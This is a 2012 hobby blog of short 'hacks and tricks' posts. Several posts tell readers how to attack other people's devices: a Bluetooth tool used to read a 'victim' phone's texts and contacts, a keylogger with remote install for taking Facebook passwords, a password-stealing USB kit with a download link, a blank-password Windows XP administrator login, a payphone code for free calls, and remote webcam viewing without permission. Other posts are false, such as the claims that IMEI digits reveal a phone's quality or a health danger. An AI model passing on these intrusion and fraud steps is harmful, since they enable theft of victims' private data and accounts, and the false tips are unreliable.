Search This Blog

Thursday, February 16, 2012

-:How to WATCH MEGAVIDEO MOVIES full free without any interruption......?:-

Hi readers....
I think you all are interested in watching ONLINE MOVIES like me.

 I think Most of you choose MEGAVIDEO to watch online movies(like me).
But most of the time during the show goes on, an interrupt screen appears (just like the following screenshot).





If we click the link 'CLICK HERE' ,we'll have to pay for continue watching movie.
 I searched in the net to get rid out of this & got an easy solution to watch online movies full freely.
I'm sharing the solution with u.
Here it is :
1) Go to EZYWATCH.com

 2) Type the megavideo movie URL ( of the movie u wish 2 watch) in the allocated SPACE.
3) click WATCH.
4) click " WATCH MOVIE ON FREE PLAYER ".
5) U are done.
     HAVE FUN.....

-:HOW TO HACK A MOBILE.........?:-

How to  HACK CELLPHONES through BLUETOOTH, and how to PROTECT yourself..........?

Hacking into your cell phone through bluetooth is now so simple that the hacker don’t even need to have any hacking skills.
All he need is your bluetooth enabled.
And you may not realize that walking around with Bluetooth enabled on your cell phone you are at the mercy of  hackers.
They can easily connect and manipulate your phone simply by using a Bluetooth connection. 
We’re here to explain how it’s done and how to protect yourself from such an attack.

Many people turn on Bluetooth to use a headset or sync with their computer, and then simply forget to turn it back off when they’re done. 
This is why Bluetooth hacking has become so prevalent and so easy to do.

Here’s how it’s done; a hacker can simply download a software called Super Bluetooth Hack and install it into his cell phone.
This software can be used for controlling and reading information from remote phone via bluetooth or infra.
Phone list and SMS can be stored in HTML format. In addition to it, it will display information about battery, network and sim card.

 It is important that the victim should accept the Bluetooth connection first time, but this step is required just once for pairing the phones.
Then it doesn’t require to pair the phones the next time.

The latest version of Super Bluetooth Hack offers following functions if configured correctly:
- Informations: display informations about battery, network, sim card
- Ringing: playing sounds of incoming call, alarm clock.
- Calls: dialing number, ending a call..
- Language: change language in phone
- Keys, Pressed keys: pressing and watching pressed keys
- Contacts
- Reading SMS
- Silent mode: turning on or off
- Phone functionality: turning off the network / phone
- Hlasitosť zvonenia
- Alarms:
- Clock: change date and time
- Phone locks
- Clip, Clir
- Change network operator
- Java: start, delete java applications
- Media Player
- Text
- SE applications
- Calendar
- Keys sound
- temperature
- Paired devices:
- Volume
- Memory status:
- Radio icon
- Keylock

Check out the tool from the download link given below and try out this tool in your Symbian phones..n have Fun....!!!!...:)
To download CLICK HERE.

To know how to install SUPER BLUETOOTH HACK CLICK HERE.

-:HOW TO DOWNLOAD & INSTALL bluetooth hacking software (Super Bluetooth Hack)....?:-

HOW TO  DOWNLOAD & INSTALL bluetooth hacking software (Super Bluetooth Hack)

To download the software CLICK HERE.

Simply follow these simple steps to Install Super Bluetooth Hack in to your mobile. This software works best at symbian platform but many other models supporting java can also run this software.  To check if your mobile is supported or not, check the PHONE LIST at the bottom.

1: Download SUPER BLUETOOTH HACK to PC.
2: Transfer it to your Bluetooth enabled mobile.
3: Run the Installer (Remember, You must have Java enabled phone for installing )
4: He finds it and you will be able to run program
5:Select the language and configure it.

6: Click > Connection
7: Click > Search Devices
8: Choose the “Victim”
9: And start managing with following hacks mentioned with Bluetooth.



Change the language to English (As ur wish):
If the software starts with the language “Slovencina”, you can change it to English on this way:
1.If you start the application for the first time you see “Nastavenia” in the title.
2. Go a bit down until you see “Jazyk”.
3. Click choose.
4. Select “English”.
5. Click “More”.
6. Click “Spat”.
7. Now the program is in English.

To know HOW TO HACK, CLICK HERE.

Supporting PHONE LIST:

Acer: beTouch E100(C1), beTouch E101(E1), beTouch E200(L1), DX650, DX900, F900, M900, neoTouch(F1), X960

Alcatel: One Touch 557a, One Touch 756, One Touch C550, One Touch C552a, One Touch C630, One Touch C652, One Touch S621, One Touch S626, One Touch V570, Mandarina Duck, Mandarina Duck Moon, N1 ELLE GlamPhone, N3 ELLE GlamPhone, One Touch 660, One Touch 708 Mini, One Touch 800 Tribe, One Touch C552, One Touch C700, One Touch C701, One Touch C707, One Touch C717, One Touch C750, One Touch C820, One Touch C825, One Touch S320, One Touch S853, One Touch S920, One Touch V670, One Touch V770

Amoi: 8512, 8709, E850

Asus: M307, P535, V66, M20 Nuvifone, M310, P320, P525, P526, P550, P552, P750, P835, V75, V80

Audiovox: SMT 5600

BenQ: P50, C30, EF51

BenQ-Siemens: CL71, E81, E61, E71, EF91, S81, S88, SL91

BlackBerry: 7100i, 7130, 7130e, 7250, 7290, 7520, 8100, 8110, 8120, 8130, 8220, 8300, 8310, 8320, 8330, 8700, 8703e, 8707, 8800, 8820, 8830, Bold 9000, curve 8520, Curve 8900, Storm 2, Storm 9500, Storm 9530, Tour 9630

CECT: A1000

Cingular: 2125

Dopod: 515, 565, 575, 585, 557w, 586w, 595, C720W

Fly: SX210

HP: iPAQ 910c, iPAQ 510 Mobile Messenger

HTC: HD2, P3600, Touch Pro 2, 6800, EVO 4G, MTeoR, myTouch 3G Slide, P3000, P3350, P3400, P3450, P3470, P3600i, S650, Touch, Touch 2, Touch 3G, Touch Cruise, Touch Diamond, Touch Dual, Touch HD, Touch Pro, Touch Viva, TyTN II

Huawei: M750, U526, U626

I-mobile: 510

K-Touch: A905

LG: B2070, B2150, C1100, C1150, C2600, C3400, GM200 Brio, GS190, GS290 Cookie Fresh, GW300, KC910, KE770, KS20, KS360, KU450, MG100a, MG105, MG220, T300, U8330, VX7000, C2000, CG225, CU320, CU400, CU500, CU720, CU915, CU920, F2400, KE500, KE600, KE800, KE820, KE970, KE990, KF750, KG195, KG200, KG220, KG225, KG240, KG245, KG290, KG300, KG320, KP500, KU580, KU800, KU830, KU970, KU990, LG550, LX550, LX570, M4410, MX510, P7200, S5200, Trax CU575, TU500, TU515, TU575, TU915, U310, U8210, U8290, U8500, U880, V9000, VX9400, VX9900

Lenovo: V800

MITO: 302, 8800

Micromax: GC700, Q5 fb, Q7, X600

Mitac: Mio 8390, Mio 8860, Mio 8870

Motorola: A1000, A630, A668, A728, A732, A760, C380, C390, C650, C975, E398, E398B, E398i, E550, E815, EX128, i930, Razr V3, RAZR V3a, RAZR V3m, V180, V186, V188, V220, V300, V303, V3v, V400, V500, V505, V525, V525M, V535, V545, V550, V551, V555, V600, V600i, V620, V635, V690, V80, V975, W220, W395, A1200, A1210, A1600, A3100, A780, A810, C257, C261, C290, E1000, E1070, E680, E680i, E770, E770-Vodafone, E790, i580, i830, i850, IC402, IC502, IC902, K1, K3, KZRK K1, L6, L6i, L7-Vodafone, L71, Motoming A1600, Motozine ZN5, MPx220, PEBL U3, Q, Q Plus, Razr V3x, RAZR V3xx, RAZR V3xxv, RAZR V6, RAZR2 V8, RAZR2 V9, RAZR2 V9m, RIZR Z10, RIZR Z8, ROKR E1, ROKR E2, ROKR E6, ROKR Z6, ROKR Z6m, SLVR L7, SLVR L7e, SLVR L7i, SLVR L9, U9, V1075, V1100, V177, V190, V191, V195, V197, V235, V360, V360-Vodafone, V365, V3c, V3i, V3m, V3r, V3t, V3x-Vodafone, V557, V980, V980M, W315, W375, W490, W510, Z3


NEC: e616, N600

Nokia: 1682c, 2220 slide, 3152, 3220, 5232, 5250, 6030, 6124 classic, 6260, 6303 Classic, 6600, 6620, 6670, 6710 Navigator, 6720 classic, 6730 classic, 6760 slide, 6788, 6790, 7230, 7610, 8800, C3-00, C5-00, C5-01, C5-03, C6-00, E5-00, N70-1, X2, X5-00, X5-01, 1680c, 2320c, 2323c, 2330c, 2600 classic, 2610, 2626, 2630, 2660, 2680, 2690, 2700 classic, 2720 Fold, 2730c, 2760, 2855, 2855i, 2865, 2865i, 3109 classic, 3110c, 3120 classic, 3155, 3155i, 3208c, 3230, 3250, 3555, 3600 slide, 3610 Fold, 3710 Fold, 3711 Fold, 3720c, 5000, 5070, 5130XM, 5140, 5140i, 5200, 5220 XpressMusic, 5228, 5230, 5300, 5310 XpressMusic, 5320, 5500, 5530XM, 5610, 5611XM, 5630XM, 5700, 5730XM, 5800 XpressMusic, 6020, 6021, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6101, 6102, 6102i, 6103, 6110 Navigator, 6111, 6120, 6120c, 6121 classic, 6125, 6126, 6131, 6133, 6151, 6152, 6155, 6165, 6165i, 6170, 6210 Navigator, 6220 Classic, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6265, 6265i, 6267, 6270, 6275i, 6280, 6288, 6290, 6300, 6301, 6500c, 6500s, 6555, 6600 slide, 6630, 6680, 6681, 6682, 6708, 6822, 7070, 7210 Supernova, 7260, 7270, 7360, 7370, 7373, 7390, 7500, 7510 Supernova, 7710, 8600 Luna, 8800 Sirocco, 9300, 9300i, 9500, 97 mini, C6, E50, E51, E52, E55, E60, E61, E61i, E62, E63, E65, E66, E70, E71, E71x, E72, E73, E75, E90, N70, N71, N72, N73, N75, N76, N77, N78, N79, N80, N81, N81 8GB, N82, N85, N86, N90, N91, N92, N93, N93i, N95, N95 8GB, N96, N97, N97 Mini, X3, X6
O2: Ice

ONIDA: G720

Orange: SPV, SPV C100, SPV C500, SPV C550, SPV C600, SPV C700, SPV e100, SPV E200

Palm: Treo 500v

Panasonic: SC3, X500, VS2, VS3, VS6

Pantech: PG-1400, PG-1410, PG-C300

Philips: 568, 755, 756, S890, 588, 766, 768, 960, S900

QTek: 7070, 9100, 8020, 8080, 8100, 8300, 8310, 8500

RoverPC: M1

SPV: C500, C550


Sagem: MY C4-2, MY C5-2, MY C5-2 Vodafone, MY C5-3, MY V-55, MY V-56, MY V-65, MY V-75, MY X-4, MY X-5-2T, MY X-6, MY X-7, MY X-8, MY X5-2, MY X5-2M, myX5-2v, Sagem myS-7, MY 302X, MY 301X, MY 400V, MY 400x, MY 401C, MY 401X, MY 401Z, MY 405X, MY 419X, MY 501c, MY 501X, MY 600v, MY 600x, MY 700X, MY W-7, MY X6-2, MY Z-5, my411X

Samsung: A877 Impression, B3210 CorbyTXT, B3310, B3410, B5310 CorbyPRO, C3212, C3222, C3300K Champ, C3510 Genoa, C5010 Squash, C5212, E1410, E2120, E2152, F270 Beat, GT B5722, GT C3303k, GT C6625, GT S3653 Corby, GT S5233A, GT S5253, I8000 Omnia II, J150, S3100, S3310, S3600, S5350 Shark, SGH C130, SGH C160, SGH C200, SGH C207, SGH C207L, SGH C210, SGH C230, SGH C300, SGH C400, SGH D410, SGH D720, SGH E300, SGH E310, SGH E310C, SGH E315, SGH E316, SGH E530, SGH E568, SGH E600, SGH E620, SGH E710, SGH E715, SGH E720, SGH E728, SGH i710, SGH i780, SGH P300, SGH P400, SGH P510, SGH P777, SGH t401g, SGH U600, SGH X105, SGH X120, SGH X160, SGH X200, SGH X210, SGH X300, SGH X430, SGH X450, SGH X480, SGH X486, SGH X500, SGH X510, SGH X530, SGH X630, SGH X636, SGH X660, SGH X680, SGH X686, SGH Z107, A717, C3010, Galaxy i7500, i300, i320, i320N, i8510, i8910, Instinct M800, S5620 Monte, SCH A870, SGH A701, SGH A707, SGH A827, SGH C140, SGH C170, SGH C260, SGH C406, SGH C417, SGH D407, SGH D500, SGH D500C, SGH D500E, SGH D510, SGH D520, SGH D600, SGH D600E, SGH D800, SGH D807, SGH D820, SGH D830, SGH D836, SGH D840, SGH D880, SGH D900, SGH D908, SGH E200, SGH E210, SGH E250, SGH E330N, SGH E340, SGH E340E, SGH E350, SGH E350E, SGH E360, SGH E370, SGH E376, SGH E380, SGH E388, SGH E390, SGH E420, SGH E490, SGH E500, SGH E570, SGH E690, SGH E730, SGH E736, SGH E740, SGH E760, SGH E780, SGH E788, SGH E810, SGH E830, SGH E840, SGH E870, SGH E878, SGH E890, SGH E898, SGH E900, SGH E950, SGH F480, SGH F490, SGH F500, SGH G600, SGH G810, SGH i300, SGH I320, SGH i450, SGH i550, SGH i560, SGH i600, SGH I607, SGH i617, SGH i900, SGH J600, SGH J700, SGH J750, SGH L760, SGH M600, SGH P200, SGH P310, SGH P850, SGH P900, SGH P906, SGH P910, SGH P920, SGH T209, SGH T219, SGH T319, SGH T329, SGH T509, SGH T509S, SGH T519, SGH T609, SGH T619, SGH T629, SGH T729, SGH T809, SGH U900, SGH X490, SGH X495, SGH X506, SGH X507, SGH X520, SGH X540, SGH X620, SGH X620C, SGH X640, SGH X640C, SGH X648, SGH X650, SGH X670, SGH X700, SGH X820, SGH X830, SGH Z140, SGH Z170, SGH Z230, SGH Z240, SGH Z300, SGH Z370, SGH Z400, SGH Z400V, SGH Z500, SGH Z510, SGH Z530, SGH Z540, SGH Z560, SGH Z630, SGH Z720, SGH ZV10, SGH ZV40, SGH ZV50, SGH-i600, SGH-i607, SGH-L700, SGH-P520, SGH-V820L, SPH A900, SPH A900P, SPH A920, SPH A940, SPH A960, SPH M500, SPH M510, SPH M610, SPH M620, Z130, Z150

Sanyo: S750, SCP-6600

Sharp: 550SH, 703, 705SH, 802, 802SH, 825SH, 880SH, 902, 903, 904, 923SH, 930SH, 934SH, 936SH, 940SH, GX-L15, GX15, GX17, GX25, GX29, GXT15, 770SH

Siemens: AP75, C65, C65-Vodafone, C66, C72, C75, CF75, CF76, CX65, CX70, CX75, EF81, M65, M75, ME75, S65, S75, SK65, SL65, SL75, ST60

Sony-Ericsson: C510, Equinox TM717, Hazel, J105 Naite, J108i Cedar, J220i, P900, P910, P910a, P910i, T715, u10i Aino, U5i Vivaz, W395, W595, W595s, W610i, W980, W995, Zylo, C702, C902, C905, D750, D750i, F305, F500i, G502, G700, G900, J300a, J300i, K200i, K300, K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i, K550i, K600, K600i, K608i, K610, K610i, K618i, K630, K660i, K700, K700c, K700i, K750, K750i, K770, K790a, K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P990i, S302, S500i, S700, S700i, S710a, T250i, T650i, V600, V600i, V630i, W200a, W200i, W300, W300i, W350, W380, W550c, W550i, W580i, W600c, W600i, W660i, W700i, W710i, W760, W800i, W810i, W810iv, W830i, W850i, W850iv, W880i, W890i, W900i, W910i, W950i, W960, X1, Z1010, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a, Z550i, Z555, Z558i, Z610i, Z710i, Z750, Z800

Spice: M6363, S7000, D-90

T-Mobile: SDA, SDA (US name), MDA Dash, MDA Mail, SDA II, SDA Music

Tatung: M1

Toshiba: G500

VK Mobile: VK4000

Vodafone: v1210, v1240, VDA II, VDA IV

ZTE: F866, T930

i-mate: Smartphone2, SP Jas, SP3, SP3i, SP5, SP5m, SPL.

Disclaimer: I have outlined these software for your information and knowledge purpose only.
It’s an advice to all the multimedia phone users to keep off your Bluetooth and if any harm will occur then we do not take any responsibility.

POST SOURCE: INTERNET.

-:Make Free Calls From Pc To Phone In Anywhere In The World:-


There are many sites which help you to send free SMS anywhere in the world, but do you know how to make a FREE CALL?
If not, then here it is........!!!
EvaPhone is Website which gives you a platform to make an International calls through your PC without any software.
We can make a call to almost every nations,either on mobile or land line.
The only thing is that your calls are limited to certain length.
The free call duration varies depending on the call destination and line provider.
The maximum free call allowance for some countries can go up to 5 minutes per call and 2 calls per day.


  * How to make a Call

1.Just go to EVAPHONE WEBSITE.




2.Simply dial the country code and the number where you want to call.
   Note that you can check the Free minutes from their Free Minute  tab.




3.Place your call and wait to be connected with end user.





4.You can use your own dashboard after signup to store numbers in online phone book.
If u want to make more call simply buy their credits.

NB::Remember that EvaPhone logs all the details of call originator and end user, so don’t use it for illegal purpose you may be caught immediately.

-:Hack Windows XP administrator password......!:-

[How-to] Hack Windows XP administrator password..

If you have forgotten your Windows XP account’s password, then you can still login through another account –
that is “Administrator” account of windows and change or remove your own account’s password from there.
It’s an old trick but still unknown by many Windows XP users.

1. On Login screen, press CTRL+ALT+DEL twice in such a way that there should be a pause of about one second before your second press of CTRL+ALT+DEL.
Don’t do this quickly, give a little pause between the two combination!

2. You will see a login screen where, you’ll be asked to enter Administrator password.

3. Just press the Login button or Enter Key, leaving the password field blank!

You’ll be logged in your system with the Administrator account, which is not seen at normal login screen.
This is because mostly when windows is installed at home computers, administrators passwords are ignored and left blank during installation.

When you enter this account, with this trick, you actually log into the actual administrator account of Windows, from where you can easily go to:

control panel > user accounts, and change or remove any windows account’s password...!

-:Google Gravity..........?:-

Google Gravity is an experiment project by mrdoob.com
In Google Gravity all the web pages would behave as if it is subjected to GRAVITATIONAL FORCE.
So all the web pages would be falling down .





How to Play/ Enable Google Gravity?

   1. Visit GOOGLE.
   2. Turn off the....
Google Instant Search
   3. Type in Google Gravity into the search box.
   4. Click on I’m Feeling Lucky button.
   5. Move the mouse.
   6. You can start play with Google Gravity enjoy.
 
8 TRICKS OF GOOGLE GRAVITY

Well guys what kind of  tricks you could play with the Google Gravity?

Trick 1. Move Them Around
           If you thought that once the elements fall down, that’s the end of the magic -- you are wrong, its the beginning.
Try holding any piece. To hold a piece click and hold the element and drag then around the screen.
You can grab and move all the pieces.

Trick 2. Drop Them
           In addition to the above one, you will see that once you un-grab the elements (by leaving the mouse button) it falls below.
Well its like the real world you see, gravity is acting over here.

Trick 3. Hit Them Hard
            Its the fun part. Grab any piece and use it to hit others. Fun.
Also the size of the element you are using has effect on the force it generates.
Try using the logo or the search-bar.

Trick 4. The Pendulum
           Hold the Google logo by one of its sides and hold it up and shake it, It starts to oscillate like a pendulum. Try it ouT!!!

Trick 5. Shake Effects
           Restore the window to a smaller size. Now hold the window and try shaking it around.
Didn’t expected the elements to move around that way? ;) Well it does!!!

Trick 6. Enlarge Effect
           While the window is still restored to a small size, maximize the window and see the elements jump.

Trick 7. It’s Alive
           If you have not realized it already, all the elements in the screen is actually working.
All the links, buttons, radio-buttons work exactly in the same way they meant to be. Try typing on the search-bar...

Trick 8. Search Still Working
           This is the one which very few people actually know.
           Try typing any query into the search-bar and click the search   button (or if you cant find it in the debris hit the enter button).
WOW! Right? The results are dumped into the screen as if by some invisible hands.

Again these links are actual results and are working.

-:Is your Nokia Cell Phone Original.....?:-

Nokia is one of the largest selling phones across the globe.
Most of us own a Nokia phone but are unaware of it’s originality.
Are you keen to know whether your Nokia mobile phone is original or not?
Then u are in the right place and this information is specially meant for you.
Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.

Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).

Then check the 7th and 8th numbers

Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your phone was assembled in Emirates which is very Bad quality

IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your phone was manufactured in Germany which is fair quality

IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your phone was manufactured in Finland which is very Good

IF the Seventh & Eighth digits of your cell phone are 00 this means your phone was manufactured in original factory which is the best Mobile Quality

IF the Seventh & Eighth digits of your cell phone are 13 this means your phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

MORE UPDATES COMING ON THIS POST.....kEEp viSITing....

-:USE FACEBOOK IN YOUR MOBILE WITHOUT INTERNET:-

CAN'T YOU BELIEVE THIS...?

Yes its true....!
Facebook has recently announced that mobile users can access their Facebook accounts,
even if they don’t have INTERNET service on their phones.
FACEBOOK INDIA has partnered with FONETWISH to bring Facebook on every mobile phone
without requiring any APPS or Internet.
It works with any mobile, even on the phones of STONE AGE...!!!

THINGS TO DO:

Simply DIAL *325# (called *fbk#)  from your mobile phone.
After dialing the *325# number, you will recieve a message that “we will be BACK”.
Then enter your Facebook username and password, That’s it you’re in....!!!





You can also send number based commands to access various features of Facebook-
You can quickly UPDATE FACEBOOK status , CHAT with friends who are online, Can add new people to your friends list,and a lot more.....

You can ACCESS your Facebook account by using this service from anywhere( in INDIA).

NOTE::   It costs you not more than a subscription fee of rupee 1.00 per day for unlimited usage.
The only problem with using Fonetwish is that it has a limit of 140 characters.
This service is now available in India via Airtel, Idea, Aircel, Tata Docomo and well known networks as well. 

-:HOW TO HACK FACEBOOK........?:-

HOW TO HACK FACEBOOK........?

Possible Ways to Hack Facebook Password

1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each & every keystroke that is  typed on a specific computer’s keyboard.
This is possible with the use of a small computer program called keylogger (also known as spy software).
Once installed, this program runs in the invisible mode & start capturing each & every keystroke that was typed on the computer.

Some keyloggers with advanced features can also capture screenshots & monitor every activity of the computer.
Anyone with a basic knowledge of computer can install & use this software with ease.
Hence for a "novice" computer user this method is the easiest way to hack Facebook password.

One of the best popular keylogger is SNIPERSPY.

 SniperSpy (TESTED) is a revolutionary product that will allow you to easily access *ANY* online account or password protected material
such as MySpace, Facebook, Yahoo, Gmail or Hotmail.
There are absolutely *NO* limitations to what accounts or websites this software can access..!

To DOWNLOAD:

SniperSpy – for Windows
Click Here

SniperSpy – for Mac
Click Here

SniperSpy has REMOTE INSTALLATION FEATURE also.

BEWARE::: On many websites & Internet forums you will often see fake articles about Facebook hacking.
Most of them will be FAKE..... So be sensitive about what you are doing...!

-:Awesome VLC!!!:-

Awesome VLC...

-:Things that MICROSOFT Could not Explain!!!:-

Things that MICROSOFT Could not Explain!

TRY this....

MAGIC #1

Found that nobody can create a FOLDER anywhere on the Computer which can be named as "CON". This is something funny and inexplicable? At Microsoft the whole Team, couldn't answer why this happened! TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER


MAGIC #2

For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
Noticed the weird bug? No one can explain!


MAGIC #3

Again this is something funny and can't be explained?
At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself?
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER And see the magic?..!


Magic #4

Did you know that a flight number from one of the planes that hit one of the two WTC towers on 9/11 was Q33N. In Notepad / WordPad or MS Word, type that flight number i.e Q33N. Increase the font size to 72. Change the font to Wingdings. ..... u will be amazed by the findings!!!

NB: Magic #4 will not work in windows 7.

Friday, January 6, 2012

-:USB Steals Pc Passwords:-






USB Steals Pc PasswordsUSB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:

1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.

2.Insert the USB in your victim's computer.

3.View folder "dump" to see the passwords.

DOWNLOAD LINK:

http://rapidshare.com/files/87198710/USBThief_zarksentinel_www.cw-network.info.rar

Password: : : : www.cw-network.info

-:Linux operating system:-

What Are The Vulnerabilities?
The main vulnerability of Linux OS is that anyone can access the code of the operating system. And, if you are not savvy enough with the programming code like hackers are. You only need to search for the correct free Linux hacking tool and you will be able to get inside in no time. 


The other problem is that many of the drivers made for determined hardware. Let's say, a printer is not created by people who have security in mind. This is specially important for a company who do not wish to find it's intellectual property is stolen each time they send something to the printing room.

So, after all of these possible loopholes inside Linux OS, you should consider using a version that has been designed with security in mind. Check www.engardelinux.com and find more about this variation of Linux OS.

What Is Kernel Hacking?
The kernel is the software inside a computer that is in charge of maintaining an adequate communication between the hardware and the rest of the software. One of the strong points among the Linux community is that the kernel of a Linux OS can be altered. And for what reason? The two main motives are fixing any problem that may arise and increase the efficiency of a driver responsible for managing a determined piece of hardware

Hacking Runescape
Runescape is a massively multiplayer online role-playing game that was launched in 2001 by Jagex Limited. The marvelous thing about this online game is that it is independent of the operating system that you are using since it works over the web using JAVA (JAVA is a platform that can work in any kind of computer since it creates a virtual machine for its own use).

But as in any online game, you will find people who are hacking Runescape. Although it is free to use and only requires some basic information for it's subscription, some hackers are willing to spend their time trying to find a backdoor or any other scheme that will permit them obtain an advantage over other players. One could say that it is inevitable due to the competitive nature of our species.

So, Runescape hacking, hacking programs for Runescape, free password hacking programs for Runescape, files for hacking Runescape and hacking Runescape accounts has become quite common among players. Although some could say that there is no grace in doing this since it is basically cheating, hackers don't think the same. For them, using any method for being the best in the game isn't only good; it's what is expected from any human being.

Thanks to free network hacking tools, hackers from around the world with a basic knowledge of English and some practice with computers, can start lurking networks everywhere, waiting for their chance to success and increase their reputation inside the hacking community. Although right now Windows is the preferred platform, Linux hacking will become a favorite amongst hackers.

-:Linux hacking:-

Since Microsoft has a huge chunk of the operating system's market in the world, it is the first victim of hackers. But that doesn't mean that Linux hacking doesn't exist. Although is less common than it's close sourced companion, there are several reasons why hackers try to hack machines with Linux. Many corporations use Linux as their server on the web as it is cheaper and easier to deploy. Its security is also better when compared to Microsoft operating systems. No wonder that network hacking tools for this open source operating system have proliferated in the last years.


What Are The Issues With Open Source Linux?
The main difference between Linux and Windows is that Linux is open source and windows are closed source. So? Well, that means that only Microsoft is authorized to change any part of the code of the Windows operating system. While in Linux, anyone can change it.

The other problem is that the Linux Operating System doesn't receive the same level of support as Windows does. That means that updates and security packages are released with each new version of the Operating System (OS), but not as periodic updates as in the case of Windows XP's Windows Update.

That means that the user will have to be the one responsible for checking for the updates instead of trusting this matter to an organization. So, a user could pass long periods of time without knowing that his OS has an important security failure that could compromise his work or even the security of his network.

The only way to contra rest this inconvenient, is buying support from a determined Linux OS provider, like Red Hat. For an annual fee, they will provide you with important information on the different bugs that have been found in the OS and that need to be fixed.

If you choose otherwise, you will spend a long time inside forums talking to Linux experts around the world. If that isn't the core competence of your business, why should you spend that time doing it? That's one of the main arguments that Microsoft uses when comparing it's OS with open source OS's.

Continue to Weakness in Linux OS

-:Talk 999 min for almost free:-

talk free from 1 rupee coin box..
Check this talk free from 1 rupee coin box..
100% Works !
yes u can talk free from 1 rupee coin box
wht u hve 2 do is first pick up the reciever
dial *** then 68807 then first 7 no.s which u r calling then #" 999"
this 999 is for your limit u can talk 999 min so u can only press no.s like this for eg
333 , 444, 555 do 999 it will be better then #0
then insert the coin nd dial full number nd u can talk for 999 minutes free
full code ***68807 first seven no.s #999#0
imp thing ------ this only works on red 1 rupee coin box do it..
It works 100% !!!

-:how-to-unlock-password-protected-memory-cards:-

Well its quite simple but most of the people do not know it.
Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.
This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file - The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.

-:Search Engine tips:-

If you want to get some information about any topic using search engine, the search engine will search the given information and will provide a list of links of websites along brief description about each website. You should use the right search terms for relevant results.

The following points must be noted to search the information on the internet.

· •You can type all word in lowercase and also in uppercase, search engine will return the same result. But the best practice is type search keywords always in lowercase.

•Use + sign between words if you want to search the all words. For example, to search history of Football in Europe, type as:
history+Football+Europe

•To search the exact match, write the words in double quotation marks. For example to search the map of Europe, then type as:
"Map of Europe"

• Always avoid to use "and", "or" with search keywords, because these words will affect the search result. 

-:Yahoo webcam without permission:-

Without No doubt, It almost impossible for us to achieve an access to view yahoo webcam without Permission. We believe that what we means about, Accessing Yahoo Webcam without Permission is a way we don’t even need an permission or acceptance from the owner of the web cam of yahoo messenger to view their webcam. We already knew that Yahoo Messenger designed to handle view webcam had to accept first from the user before they can view their webcam. So, is there any possibility to view Yahoo Messenger webcam without Permission?


Access View Yahoo Webcam Auto Accept
Legally, there is only one way to view webcam “without need a permission”. Without need a permission here, means that we don’t even to wait the owner of the yahoo webcam to click or push the accept button of request window of yahoo messenger webcam. It is better if we call this “without need a permission” in legal way is “Yahoo Webcam Auto Accept“. How to make auto accept of Yahoo Webcam? Go to webcam setting and then add user in the box of “Always allow the following people to view my webcam“. This will make the user that has this option will always set auto accept when they are requesting the owner webcam. The problem is how we can add our yahoo id in there? Just figure it out how you can do it. OK?





View Webcam Without Permission Remote Webcam




We will tell you, this software called as I Can See You is work like CCTV. That way we can use it as “Webcam Without Permission”. Without Permission in here means that we don’t need to accept the view webcam or when we try to view webcam because the web cam is always set accepted. No need Messenger Client Service to do it. All we have to have just Webcam and Internet Connection. How to achieve it?

Like we said above, this Remote Webcam is software that will remote from others computer of the webcam computer that been installed the software. For example, we can view our webcam in home or office when we are far away from them such as in vacation or in a way home.

Unfortunately, this software that sometime called as Webcam Spy is not freeware software. You need to buy it to use it. You can buy at here  

-:Yahoo multi messenger without software:-

I am going to tell abt yahoo multimessenger.... with installing any software....main thing is u can get same version of messenger u r using...which is not possible with yahoo multimessenger software just make the things as following.... go to start menu and select run just type "regedit" in that now u will get a window now in that select HKEY_CURRENT_USER in that go for SOFTWARE ----->YAHOO---->PAGER----->TEST now just slect on TEST on the right side u can see name type data in that u will have default........... now below default just right clik and create new one .....in new u have to select DWORD VALUE then right click on created one and rename it to 'plural'

again right click on it and u can c MODIFY clik on it .. now change VALUE DATA to 1 and there itself change BASE to decimal from hexadecimal.....thats it frndz... now just once logoff from ur messenger and again sign in..... now just clik on the yahoo messenger where u will open ur messenger usually....u can open any no of messenger u want...
...enjoy frndz,,,.
From Hackit!!!

-:Change the Default Directory of Software Installation:-

You may want to change the location of your system default folder (C:Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.

Follow the given steps to configure windows registry:

1. Click on Start button then type Regedit in Run option.

2. Here navigate to: HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion

3. In right side panel, double click on ProgramFileDir.

4. Now modify the value to any other drive (for example D:Program Files).


Now close the registry editor and restart your computer after any changes to go into effect.

Thursday, January 5, 2012

-:Hack This Website Test:-

If you really think you are a hacker, then

Go to:


www.hack-test.com


Reply with what level you are on!!

-:Top 15 Hacking Software:-

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

